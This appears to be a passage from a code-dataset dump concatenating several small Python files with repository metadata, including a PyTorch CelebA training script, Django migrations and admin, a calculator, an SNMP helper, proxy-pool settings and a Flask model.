    start = time.time()
    best_weights = copy.deepcopy(model.state_dict())
    best_acc = 0.0
    # NOTE(review): current_lr is read once here and only used for printing;
    # it will not reflect scheduler updates in later epochs.
    current_lr = optimizer.state_dict()['param_groups'][0]['lr']
    epoches = args.epoches
    for epoch in range(0, epoches):
        print('epoch', epoch + 1, '/', epoches, '\tlearning rate', current_lr)
        running_loss = train_acc = 0
        for x, y in train_loader:
            x, y = x.to(device), y.to(device)
            model.train()
            optimizer.zero_grad()
            x.requires_grad_()
            s = model(x)
            loss = criterion(s, y.float())
            loss.backward()
            optimizer.step()
            # accumulate per-sample loss/accuracy, averaged after the epoch
            running_loss += loss.detach().item() * x.size(0)
            train_acc += batch_accuracy(s.detach(), y)[0]
        running_loss /= len(train_loader.dataset)
        train_acc /= len(train_loader.dataset)
        print('time elapsed:%d s ' % (time.time() - start))
        print('running loss:\t', running_loss, 'training accuracy:\t', train_acc * 100)
        scheduler.step()
        if validate:  # validation if set true
            with torch.no_grad():
                running_loss = val_acc = 0
                for x, y in val_loader:
                    x, y = x.to(device), y.to(device)
                    model.eval()
                    s = model(x)
                    loss = criterion(s, y.float())
                    running_loss += loss.detach().item() * x.size(0)
                    val_acc += batch_accuracy(s.detach(), y)[0]
                running_loss /= len(val_loader.dataset)
                val_acc /= len(val_loader.dataset)
                print('validation loss:\t', running_loss, 'validation accuracy:\t', val_acc * 100)
                # copy model weights if validation accuracy improves
                if val_acc > best_acc:
                    best_acc = val_acc
                    best_weights = copy.deepcopy(model.state_dict())
                    torch.save(best_weights, args.root + 'checkpoints/' + args.checkpoint)
                elif val_acc < best_acc - 0.01:  # if validation accuracy drops by 1%, stop early
                    print('validation accuracy is not improving at {} epoches, stop early here'.format(epoch))
                    break
    print('best accuracy', best_acc * 100)
    # load best weights before returning
    model.load_state_dict(best_weights)
    return model
def test(model, loader, criterion, device):
    """Evaluate the checkpointed model on ``loader``.

    Reloads weights from the checkpoint first, then reports overall loss,
    overall accuracy, and per-attribute accuracy (40 CelebA attributes).
    Returns ``(test_accuracy, attr_accuracy)``.
    """
    state_dict = torch.load(args.root + 'checkpoints/' + args.checkpoint)
    model.load_state_dict(state_dict)
    start = time.time()
    with torch.no_grad():
        running_loss = test_accuracy = 0
        # per-attribute accuracy accumulator; must live on the same device
        # as the batch_accuracy outputs for the += below to work
        attr_accuracy = torch.zeros(40).to(device)
        for x, y in loader:
            x, y = x.to(device), y.to(device)
            model.eval()
            s = model(x)
            loss = criterion(s, y.float())
            running_loss += loss.detach().item() * x.size(0)
            test_accuracy += batch_accuracy(s.detach(), y)[0]
            # attr_acc need to be on cuda for computation
            attr_accuracy += batch_accuracy(s.detach(), y)[1]
        running_loss /= len(loader.dataset)
        test_accuracy /= len(loader.dataset)
        attr_accuracy /= len(loader.dataset)
    print('time elapsed:%d s ' % (time.time() - start))
    print('test loss:\t', running_loss, 'test accuracy:\t', test_accuracy * 100)
    print('accuracy per attribute\n', attr_accuracy)
    print(rank(attr_accuracy))
    return test_accuracy, attr_accuracy
def output_labels(model, loader):
    """Run ``model`` over every batch in ``loader`` and return hard predictions.

    Returns a numpy array of shape (num_samples, num_attributes) whose
    entries are -1 (attribute absent) or +1 (attribute present), obtained by
    thresholding the sigmoid of the logits at 0.5.
    """
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    model.eval()
    batches = []
    with torch.no_grad():
        for x, _ in loader:  # labels are ignored: this is pure inference
            x = x.to(device)
            s = model(x)
            preds = torch.sigmoid(s).round()  # prob >= 0.5 -> 1
            preds = preds * 2 - 1             # map {0, 1} -> {-1, +1}
            batches.append(preds.cpu().numpy())
    # Concatenate once at the end (the original re-concatenated every batch,
    # which is quadratic, and carried a dummy zeros row it had to slice off).
    if not batches:
        return np.zeros((0, 40))
    return np.concatenate(batches, axis=0)
def test_unlabelled():
    """Predict attribute labels for the unlabelled private test images.

    Loads images from ``args.root + 'test_data/'``, restores the checkpointed
    model, writes the +-1 predictions to ``predictions.txt`` (one row per
    image, prefixed with the image filename) and also saves the raw array to
    ``labels.pt``.
    """
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    # load data
    final_data = datasets.ImageFolder(args.root + 'test_data/', transform=transforms.Compose([
        transforms.Resize((178, 178)),
        transforms.ToTensor(),
        transforms.Normalize(mean=[0.485, 0.456, 0.406],
                             std=[0.229, 0.224, 0.225])
    ]))
    # shuffle=False so predictions line up with the sorted image filenames below
    final_loader = torch.utils.data.DataLoader(final_data, shuffle=False, batch_size=32)
    # load model architecture and load parameters from checkpoint
    model = load_model()
    state_dict = torch.load(args.root + 'checkpoints/' + args.checkpoint)
    model.load_state_dict(state_dict)
    model.to(device)
    print('Predicting labels for the private test data')
    labels = output_labels(model, final_loader)
    # save in case code breaks
    torch.save(labels, 'labels.pt')
    np.savetxt("predictions.txt", labels, fmt='%d', footer='\n', comments='')
    # NOTE(review): os.listdir order is arbitrary; this assumes it matches
    # ImageFolder's (sorted) order — verify on the target filesystem.
    img_names = os.listdir(args.root + 'test_data/13233_imgs/')
    file = "predictions.txt"
    # prepend each line with its image name
    with open(file, 'r') as f:
        lines = [' '.join([img, x.strip() + '\n']) for x, img in zip(f.readlines(), img_names)]
    with open(file, 'w') as f:
        f.writelines(lines)
    print('labels has been saved in the "predictions.txt" in the current directory')
if __name__ == '__main__':
    # Dispatch on the CLI flag: label the unlabelled set, or run training.
    entry = test_unlabelled if args.test_unlabelled else main
    entry()
| [
"aprilgng@gmail.com"
] | aprilgng@gmail.com |
8cc1dfe36365b07007f5930cd5143387e3556979 | 95932a51c20b91d32e609d3660a1b5be24df89ea | /utils/__init__.py | 6c2f202869f20d81f090cd577f902cc5074661fa | [
"MIT"
] | permissive | XiaohangZhan/Switchable-Whitening | ea176a9d64ca58d4e43f500aead35b2303740c5c | 8369d884af907495dc1f67f9c5d47d2d712ddffa | refs/heads/master | 2020-09-01T08:37:52.321472 | 2019-10-23T05:14:00 | 2019-10-23T05:14:00 | 218,922,053 | 0 | 0 | MIT | 2019-11-01T05:54:36 | 2019-11-01T05:54:36 | null | UTF-8 | Python | false | false | 60 | py | from .common_utils import *
from .distributed_utils import * | [
"xingangpan1994@gmail.com"
] | xingangpan1994@gmail.com |
03fcf0fdd9e8c379eaed44a632ac506afab87888 | 53ab3451fba139c002b631ff33aaf8b4e3c53628 | /Strike/Mission.py | 7fa00b3218eac5321078393d27b686ec9f5d28cb | [] | no_license | GreyPredator/DroneSimulation | c09eac5432f5be8cc647df408b5441c006afb2f2 | b20eba5734b373f403ed2739f5db70daa8a01df7 | refs/heads/master | 2020-03-08T10:59:47.560385 | 2018-08-18T18:25:57 | 2018-08-18T18:25:57 | 127,912,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 59 | py |
class Mission:
    """Placeholder for a drone mission; carries no state or behaviour yet."""

    def __init__(self):
        # Nothing to initialise for now.
        pass
"noreply@github.com"
] | noreply@github.com |
28952444eae1d539b344fe6d8e4f677565bf2bda | c86de1ee41895651d274f9d08d39db77af9ebd5f | /WhatToWear/news/migrations/0004_auto_20200110_1350.py | f4fedcd4428ea9af1dd8c99125c75ff6fad8e132 | [] | no_license | mayorov-andrey/WhatToWear | 5577b87059f77e088bbe312ddd498d6f4cd1077f | 6738a674d19204ed30ed30a354d5647885a5fff7 | refs/heads/master | 2020-12-29T15:19:51.270813 | 2020-02-08T11:57:34 | 2020-02-08T11:57:34 | 238,651,475 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | # Generated by Django 2.2.7 on 2020-01-10 10:50
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: add a db index and default to ``New.posted``."""

    dependencies = [
        ('news', '0003_auto_20200109_1917'),
    ]

    operations = [
        migrations.AlterField(
            model_name='new',
            name='posted',
            # The datetime literal was frozen by makemigrations at generation
            # time — it is a fixed historical default, not "now".
            field=models.DateTimeField(db_index=True, default=datetime.datetime(2020, 1, 10, 13, 50, 15, 383554), verbose_name='Опубликована'),
        ),
    ]
| [
"58735025+mayorov-andrey@users.noreply.github.com"
] | 58735025+mayorov-andrey@users.noreply.github.com |
ecae1e41c1a4dbea1e9f916e518c7a30df863ebe | bc9f66258575dd5c8f36f5ad3d9dfdcb3670897d | /lib/third_party/google/cloud/pubsublite_v1/types/topic_stats.py | 1ad03e069c7d8a1f576f2e229fdb25414030148e | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | google-cloud-sdk-unofficial/google-cloud-sdk | 05fbb473d629195f25887fc5bfaa712f2cbc0a24 | 392abf004b16203030e6efd2f0af24db7c8d669e | refs/heads/master | 2023-08-31T05:40:41.317697 | 2023-08-23T18:23:16 | 2023-08-23T18:23:16 | 335,182,594 | 9 | 2 | NOASSERTION | 2022-10-29T20:49:13 | 2021-02-02T05:47:30 | Python | UTF-8 | Python | false | false | 5,658 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.pubsublite_v1.types import common
from cloudsdk.google.protobuf import timestamp_pb2 # type: ignore
# Auto-generated proto-plus wrappers for the Pub/Sub Lite TopicStats service.
# Field numbers are fixed by the .proto schema and must not be changed.
__protobuf__ = proto.module(
    package="google.cloud.pubsublite.v1",
    manifest={
        "ComputeMessageStatsRequest",
        "ComputeMessageStatsResponse",
        "ComputeHeadCursorRequest",
        "ComputeHeadCursorResponse",
        "ComputeTimeCursorRequest",
        "ComputeTimeCursorResponse",
    },
)


class ComputeMessageStatsRequest(proto.Message):
    r"""Compute statistics about a range of messages in a given topic
    and partition.

    Attributes:
        topic (str):
            Required. The topic for which we should
            compute message stats.
        partition (int):
            Required. The partition for which we should
            compute message stats.
        start_cursor (google.cloud.pubsublite_v1.types.Cursor):
            The inclusive start of the range.
        end_cursor (google.cloud.pubsublite_v1.types.Cursor):
            The exclusive end of the range. The range is empty if
            end_cursor <= start_cursor. Specifying a start_cursor before
            the first message and an end_cursor after the last message
            will retrieve all messages.
    """

    topic = proto.Field(proto.STRING, number=1,)
    partition = proto.Field(proto.INT64, number=2,)
    start_cursor = proto.Field(proto.MESSAGE, number=3, message=common.Cursor,)
    end_cursor = proto.Field(proto.MESSAGE, number=4, message=common.Cursor,)


class ComputeMessageStatsResponse(proto.Message):
    r"""Response containing stats for messages in the requested topic
    and partition.

    Attributes:
        message_count (int):
            The count of messages.
        message_bytes (int):
            The number of quota bytes accounted to these
            messages.
        minimum_publish_time (google.protobuf.timestamp_pb2.Timestamp):
            The minimum publish timestamp across these
            messages. Note that publish timestamps within a
            partition are not guaranteed to be
            non-decreasing. The timestamp will be unset if
            there are no messages.
        minimum_event_time (google.protobuf.timestamp_pb2.Timestamp):
            The minimum event timestamp across these
            messages. For the purposes of this computation,
            if a message does not have an event time, we use
            the publish time. The timestamp will be unset if
            there are no messages.
    """

    message_count = proto.Field(proto.INT64, number=1,)
    message_bytes = proto.Field(proto.INT64, number=2,)
    minimum_publish_time = proto.Field(
        proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,
    )
    minimum_event_time = proto.Field(
        proto.MESSAGE, number=4, message=timestamp_pb2.Timestamp,
    )


class ComputeHeadCursorRequest(proto.Message):
    r"""Compute the current head cursor for a partition.

    Attributes:
        topic (str):
            Required. The topic for which we should
            compute the head cursor.
        partition (int):
            Required. The partition for which we should
            compute the head cursor.
    """

    topic = proto.Field(proto.STRING, number=1,)
    partition = proto.Field(proto.INT64, number=2,)


class ComputeHeadCursorResponse(proto.Message):
    r"""Response containing the head cursor for the requested topic
    and partition.

    Attributes:
        head_cursor (google.cloud.pubsublite_v1.types.Cursor):
            The head cursor.
    """

    head_cursor = proto.Field(proto.MESSAGE, number=1, message=common.Cursor,)


class ComputeTimeCursorRequest(proto.Message):
    r"""Compute the corresponding cursor for a publish or event time
    in a topic partition.

    Attributes:
        topic (str):
            Required. The topic for which we should
            compute the cursor.
        partition (int):
            Required. The partition for which we should
            compute the cursor.
        target (google.cloud.pubsublite_v1.types.TimeTarget):
            Required. The target publish or event time.
            Specifying a future time will return an unset
            cursor.
    """

    topic = proto.Field(proto.STRING, number=1,)
    partition = proto.Field(proto.INT64, number=2,)
    target = proto.Field(proto.MESSAGE, number=3, message=common.TimeTarget,)


class ComputeTimeCursorResponse(proto.Message):
    r"""Response containing the cursor corresponding to a publish or
    event time in a topic partition.

    Attributes:
        cursor (google.cloud.pubsublite_v1.types.Cursor):
            If present, the cursor references the first message with
            time greater than or equal to the specified target time. If
            such a message cannot be found, the cursor will be unset
            (i.e. ``cursor`` is not present).
    """

    cursor = proto.Field(proto.MESSAGE, number=1, message=common.Cursor,)


__all__ = tuple(sorted(__protobuf__.manifest))
| [
"cloudsdk.mirror@gmail.com"
] | cloudsdk.mirror@gmail.com |
fd0a6ba9360c28449fd6b0848a7aecadab2791fb | 1e998b8aa40e29dd21e97b1071fc5dc46d4746c2 | /example/example/urls.py | 3f3d7176338ff3f5b14369d3c51078945a69d240 | [
"MIT"
] | permissive | PragmaticMates/django-templates-i18n | 61786d0e3daf304316609fbf17f87f27457fdaae | 0dac1b8da498dc414d4836c1cf6cb82cb1597c26 | refs/heads/master | 2016-09-06T15:47:46.161242 | 2014-09-26T12:14:02 | 2014-09-26T12:14:02 | 22,213,677 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | from django.conf.urls import include, url
from django.conf.urls.i18n import i18n_patterns
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
from views import HomeView, MyView
admin.autodiscover()

# Locale-prefixed URL patterns (e.g. /en/my-view/, /sk/my-view/).
urlpatterns = i18n_patterns('',
    # Uncomment the admin/doc line below to enable admin documentation:
    url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
    # Uncomment the next line to enable the admin:
    url(r'^admin/', include(admin.site.urls)),
    # Examples:
    url(r'^my-view/$', MyView.as_view(), name='my_view'),
    url(r'^$', HomeView.as_view(), name='home'),
)
| [
"erik.telepovsky@gmail.com"
] | erik.telepovsky@gmail.com |
3b43b227b7faa549f674979711bdaec0a30fe8d9 | aaf7e8f9ec5856241930c98167071e424967b486 | /src/lib/glfs-web/app/snmp.py | f9fa73d88593c3e76f64161535626ffe193a8b58 | [] | no_license | ShenDezhou/PyCRM | e32826d143598227910c6a13bbc70140ec7f56d2 | 36b9411d9d5372b59fed00afdbc74607fb010df9 | refs/heads/master | 2022-02-10T02:29:45.876818 | 2018-06-17T10:09:43 | 2018-06-17T10:09:43 | 72,261,079 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | import netsnmp
def snmp_query(oid, dest_host, community, version=2):
    """SNMP-walk ``oid`` on ``dest_host`` and return the result tuple."""
    target = netsnmp.Varbind(oid)
    return netsnmp.snmpwalk(
        target,
        Version=version,
        DestHost=dest_host,
        Community=community,
    )
| [
"bangtech@sina.com"
] | bangtech@sina.com |
191a89e669e5fe009d41c0ba2a0ba203049cadab | b23c01fa8d96871bb2e3f56c52cd97b85cb4966a | /bin/easy_install | f93562d323772eae2324c1cd8b04239c434042e3 | [] | no_license | denyherianto/88spares-account-django | 00413ae78f4cd6ac7c0574091f3decd32e110381 | 94adba9197c71cf84486f6f3c5eba7ccc201a066 | refs/heads/master | 2021-08-15T06:53:49.707136 | 2017-11-17T15:10:08 | 2017-11-17T15:10:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | #!/mnt/d/devs/repo/python/django_test/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
    # Standard setuptools console-script stub: strip a trailing
    # "-script.py(w)"/".exe" suffix so argv[0] matches the command name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"deny.hrnt@gmail.com"
] | deny.hrnt@gmail.com | |
e911966219e03ac805ec70a13721b29ec8e85374 | 79b9965006b2aed0d85db23ab5551baf20379d29 | /Days/Day23_Calculator/Day23_Calculator.py | e833e312c06e326aa692b3f0824bbd58c61a7eac | [] | no_license | gervanna/100daysofcode | f7ef3087ab50dbf3869606d771906a4103002b1e | deaebce1e8d98b7d5b474facca5a5c2c45872886 | refs/heads/main | 2023-06-17T00:47:27.772161 | 2021-07-09T01:26:11 | 2021-07-09T01:26:11 | 315,077,257 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,090 | py | import os
from calc_art import logo
def add(n1, n2):
    """Return n1 plus n2."""
    total = n1 + n2
    return total
def subtract(n1, n2):
    """Return n1 minus n2."""
    difference = n1 - n2
    return difference
def multiply(n1, n2):
    """Return n1 times n2."""
    product = n1 * n2
    return product
def divide(n1, n2):
    """Return n1 divided by n2 (true division; raises ZeroDivisionError for n2 == 0)."""
    quotient = n1 / n2
    return quotient
# Dispatch table: operator symbol -> implementing function.
operations = {
    "+": add,
    "-": subtract,
    "*": multiply,
    "/": divide,
}
def calculator():
    """Interactive calculator loop.

    Prompts for a first number, then repeatedly for an operation and a second
    number.  'y' chains the result into the next calculation, 'e' exits,
    anything else clears the screen and restarts via recursion.
    """
    print(logo)
    # --- read and validate the first operand ---
    unvalidated_first_num = True
    while unvalidated_first_num:
        try:
            num1 = float(input("\nType the first number? "))
            unvalidated_first_num = False
        except:  # NOTE(review): bare except also swallows KeyboardInterrupt
            print("That's not a number.")
            continue
    # show the available operator symbols
    for sign in operations:
        print(sign)
    go_again = True
    while go_again == True:
        # --- read and validate the operator ---
        unvalidated_operation = True
        while unvalidated_operation:
            operation_sign = input("\nPick an operation: ")
            if operation_sign not in operations:
                print("Choose a valid operation.")
                continue
            else:
                unvalidated_operation = False
        # --- read and validate the second operand (reject divide-by-zero) ---
        unvalidated_second_num = True
        while unvalidated_second_num:
            try:
                num2 = float(input("\nType the next number? "))
                if operation_sign == "/" and num2 == 0:
                    raise ZeroDivisionError  # throw an error
                unvalidated_second_num = False
            except ValueError:
                print("That's not a number.")
                continue
            except ZeroDivisionError:
                print("Cannot divide by Zero.")
                continue
        # dispatch through the operations table and report the result
        calc = operations[operation_sign]
        answer = calc(num1, num2)
        print(f"\n{num1} {operation_sign} {num2} = {answer}")
        next_calc = input(f"\nType 'y' to continue calculations with {answer}, or type 'n' to start a new calculation, else type 'e' to exit the Calculator: ").lower()
        if next_calc == 'y':
            num1 = answer  # chain the result into the next calculation
        elif next_calc == 'e':
            break
        else:
            # restart with a cleared screen; recursion restarts the whole UI
            go_again = False
            os.system('clear')
            calculator()
    print("\nGoodbye.")


calculator()
"stephenslavern@gmail.com"
] | stephenslavern@gmail.com |
f04fded2fc33732e2058d245b2bf7265fd3e890c | 24698622d602c78a95fded3642bb81f510f8a6f7 | /Dataset.py | 3e52cb4716f5e9f8c2507e01de181103299653f4 | [] | no_license | shyamsn97/TalkingFaceModels | 781e66b1907ba62d949eb8a960c320e3235c7685 | 1e3f090615048890cce6ca454cd657dbb63b094f | refs/heads/master | 2020-06-04T12:02:36.082069 | 2019-07-30T19:58:45 | 2019-07-30T19:58:45 | 192,013,747 | 0 | 0 | null | 2019-07-30T19:58:46 | 2019-06-14T22:51:53 | Python | UTF-8 | Python | false | false | 2,222 | py | import numpy as np
import random

import cv2
import skimage
import torch
from torch.utils.data import Dataset
from torch.utils.data import DataLoader

from data_processing import *
class MetaDataset(Dataset):
    """Meta-learning dataset over video sequences.

    For a given sequence index, ``__getitem__`` holds out one random
    (frame, landmark) pair as the target and samples up to ``k`` other
    pairs from the same sequence as the support set.
    """

    def __init__(self, reshaped_frame_sequences, landmark_frame_sequences, num_videos, k):
        self.reshaped_frame_sequences = reshaped_frame_sequences
        self.landmark_frame_sequences = landmark_frame_sequences
        # Sorted so frame and landmark sequences pair up deterministically.
        self.video_sequence_names = sorted(self.reshaped_frame_sequences)
        self.landmark_sequence_names = sorted(self.landmark_frame_sequences)
        self.num_videos = num_videos
        self.k = k

    def __len__(self):
        return len(self.video_sequence_names)

    def __getitem__(self, index):
        frames = self.reshaped_frame_sequences[self.video_sequence_names[index]]
        landmarks = self.landmark_frame_sequences[self.landmark_sequence_names[index]]
        candidates = range(len(frames))
        target_idx = random.choice(candidates)
        candidates = [i for i in candidates if i != target_idx]
        # Take every remaining frame when fewer than k are available,
        # otherwise sample k of them without replacement.
        if self.k >= len(candidates):
            chosen = candidates
        else:
            chosen = random.sample(candidates, self.k)
        support = [(frames[i], landmarks[i]) for i in chosen]
        target = (frames[target_idx], landmarks[target_idx])
        return target, support
def makeDataloader(dataset, batch_size=1, shuffle=False, drop_last=True):
    """Wrap ``dataset`` in a DataLoader.

    Uses worker processes and pinned memory only when CUDA is available.
    (Removed the unused ``device``/``num_gpu`` locals of the original.)
    """
    cuda = torch.cuda.is_available()
    print("gpu available :", cuda)
    kwargs = {'num_workers': 3, 'pin_memory': True} if cuda else {}
    return DataLoader(dataset, batch_size=batch_size, shuffle=shuffle,
                      drop_last=drop_last, **kwargs)
"SSudhakaran@us.fujitsu.com"
] | SSudhakaran@us.fujitsu.com |
06c48cfb1fcdccc96982be21c4fd77acb14efe77 | 177e8944037da5d21bc325c2d4ecae149ba32d2a | /Blogapp/migrations/0008_auto_20200813_1726.py | 1ed1f66d10bd68dfda14f5587c60245ce3285cea | [] | no_license | priya-tech/My_Awesome_Blog | 42e054c4f9d60f8474355e96434ab16e9216e0aa | 24994cbafec9d1b891c572f7a647231d0b53f5d4 | refs/heads/master | 2023-02-13T01:23:19.948908 | 2021-01-08T05:54:36 | 2021-01-08T05:54:36 | 293,492,320 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | # Generated by Django 2.2.5 on 2020-08-13 17:26
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: add ``Post.header_image`` and cap ``Post.snippet`` at 30 chars."""

    dependencies = [
        ('Blogapp', '0007_post_snippet'),
    ]

    operations = [
        migrations.AddField(
            model_name='post',
            name='header_image',
            # Optional image stored under MEDIA_ROOT/images/.
            field=models.ImageField(blank=True, null=True, upload_to='images/'),
        ),
        migrations.AlterField(
            model_name='post',
            name='snippet',
            field=models.CharField(max_length=30),
        ),
    ]
| [
"priyavadhanisankar@gmail.com"
] | priyavadhanisankar@gmail.com |
996e69c5148b5df26512a00ee71bb6d5b3048f9e | b805ded84cff8878ae70d772e50cface0c3aa45c | /proxy_pool/proxy_pool/settings.py | b6ecc4f6634f97f0ee761b1fd95cd587f2e5db95 | [] | no_license | CNZedChou/python-web-crawl-learning | 74f014fe95797d3f534e373de8451d2dfcc0600c | 5edf8f53e1bb9df3661ec007bb4d7f0ba04ab013 | refs/heads/master | 2022-11-10T08:26:53.275547 | 2020-07-06T02:33:03 | 2020-07-06T02:33:03 | 275,563,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # !/usr/bin/python3
# -*- coding: utf-8 -*-
"""
@Author : Zed
@Version : V1.0.0
------------------------------------
@File : settings.py
@Description : redis的密码,如果为空则表示没有密码
@CreateTime : 2020-6-30 11:22
------------------------------------
@ModifyTime :
"""
# Redis password; an empty string means no password is set.
PASSWORD = ''
HOST = 'localhost'
PORT = '6379'
# Name of the Redis key holding the proxy pool.
PROXYPOOL = 'proxies'
TEST_API = 'https://www.baidu.com'
TEST_HEADERS ={
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36',
}
# Interval (seconds) between proxy re-validation cycles.
CYCLE_VALID_TIME = 60
# Minimum number of proxies to keep in the pool.
LOWER_NUM = 10
# Maximum number of proxies to keep in the pool.
UPPER_NUM = 100
# Interval (seconds) between pool-size checks.
CHECK_POOL_CYCLE = 60
"1021844583@qq.com"
] | 1021844583@qq.com |
af80e333fa1ab4339159aceac4aadf6d4670d924 | 289ab4b6eeb1a4f845ba66bd21c4a82670d554f3 | /cart/admin.py | f65101b164ca8b59688bd1c3ca5e5d1f7b65aeb2 | [] | no_license | 1arshan/project-e_com | 1d0765b28800ccf645dfe67ffa311ce7a6605309 | 632ed6bc4bf716777fab7c98113f754f47468705 | refs/heads/master | 2022-11-08T17:20:22.726675 | 2020-06-25T15:04:37 | 2020-06-25T15:04:37 | 270,087,413 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | from django.contrib import admin
from .models import *
from django_better_admin_arrayfield.admin.mixins import DynamicArrayMixin
@admin.register(Sub1)
class Sub1Admin(admin.ModelAdmin):
    # Changelist shows name and link; sidebar filter on link.
    list_display = ("name", "link",)
    list_filter = ("link",)


# CartObject gets the default admin (no customisation needed).
admin.site.register(CartObject)


@admin.register(FinalProduct)
class MyModelAdmin(admin.ModelAdmin, DynamicArrayMixin):
    # DynamicArrayMixin enables editing ArrayField values in the admin forms.
    list_display = ("name", "link", "model_no",)
    list_filter = ("link",)
| [
"1arshanahmad@gmail.com"
] | 1arshanahmad@gmail.com |
e81efcf1d9371dcc4c93cc298cb1fde203cd023e | 5202dacbfe047602531a32a1404061f7738e1c9a | /PersonalActivityAssistant_SourceCode/PAA/appointments/migrations/0001_initial.py | 6796684eb3a1dfef59d59230e539764c9de8745e | [] | no_license | bhna2713/CSCI-5448-OOAD-PROJECT-GROUP | 90bbec5b83db2e326fa9a6b5399d047a4a50b1fc | 95f7d658b3b1e9bae67e9a423c024e43fe22f5fb | refs/heads/master | 2016-08-11T21:22:31.269028 | 2016-04-28T14:58:08 | 2016-04-28T14:58:08 | 51,010,773 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 739 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-03-26 21:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: create the ``Appointments`` table."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Appointments',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('Title', models.CharField(max_length=120)),
                # auto_now=True refreshes this timestamp on every save,
                # not only on creation.
                ('Date', models.DateTimeField(auto_now=True)),
                ('Venue', models.CharField(max_length=120)),
                ('Time', models.CharField(max_length=120)),
            ],
        ),
    ]
| [
"bharatnc@gmail.com"
] | bharatnc@gmail.com |
593eff5c51f3663c6b63401945d8e42c0bd744e9 | 1e9de96619592ed25c3a4ff57b6a78717882a709 | /app/resources/database.py | 970e203f904febf5289d936283299a350e6346e4 | [] | no_license | AntoineDao/example-service | 503d08788f7e557ee12f72fabfa537136b927d3f | 8b088ecd0a67642737a883d7f035722a8cd7a0b4 | refs/heads/master | 2020-04-22T07:13:59.199629 | 2019-02-07T17:36:17 | 2019-02-07T17:36:17 | 170,213,289 | 0 | 0 | null | 2019-02-11T22:32:16 | 2019-02-11T22:32:16 | null | UTF-8 | Python | false | false | 988 | py | import os
import datetime
import uuid
from flask_sqlalchemy import SQLAlchemy
import app
db = SQLAlchemy()
class Example(db.Model):
    """Example model for storing example related details."""

    __tablename__ = "example"

    # NOTE: column defaults must be *callables*.  The original passed the
    # result of uuid.uuid4()/utcnow(), which SQLAlchemy evaluates once at
    # import time — every row would then share the same id (breaking the
    # primary key on the second insert) and the same registration timestamp.
    id = db.Column(db.String(), primary_key=True,
                   default=lambda: str(uuid.uuid4()))
    email = db.Column(db.String(255), unique=True, nullable=False)
    registered_on = db.Column(db.DateTime, nullable=False,
                              default=datetime.datetime.utcnow)
    admin = db.Column(db.Boolean, nullable=False, default=False)
    username = db.Column(db.String(50), unique=True)
    password_hash = db.Column(db.String(100))
    test = db.Column(db.String(100))

    def __repr__(self):
        return "<User '{}'>".format(self.username)

    @classmethod
    def from_dict(cls, data):
        """Build an Example from a plain dict; unknown keys are ignored."""
        return cls(
            id=data.get('id'),
            email=data.get('email'),
            admin=data.get('admin'),
            username=data.get('username'),
        )
| [
"antoinedao1@gmail.com"
] | antoinedao1@gmail.com |
699f3bf4ddcf39bc85c986fc35c789f2dd92398e | a3d98b7885df577e18f8f798fe6374720524c0fa | /topology/migrations/0006_remove_machine_slug.py | b5651243e55811df6df586413284efe7d9f7545e | [
"MIT"
] | permissive | DylanWatson/VENT | 296276c025ad54aaea803f03e48dd5e0ece401b7 | 0f26876b1790abfb217c3db79455fe1416730bff | refs/heads/master | 2021-01-20T12:22:51.580395 | 2015-05-05T20:44:33 | 2015-05-05T20:44:33 | 30,122,860 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated: drop the ``slug`` field from Machine (added in 0005)."""

    dependencies = [
        ('topology', '0005_machine_slug'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='machine',
            name='slug',
        ),
    ]
| [
"watson93@gmail.com"
] | watson93@gmail.com |
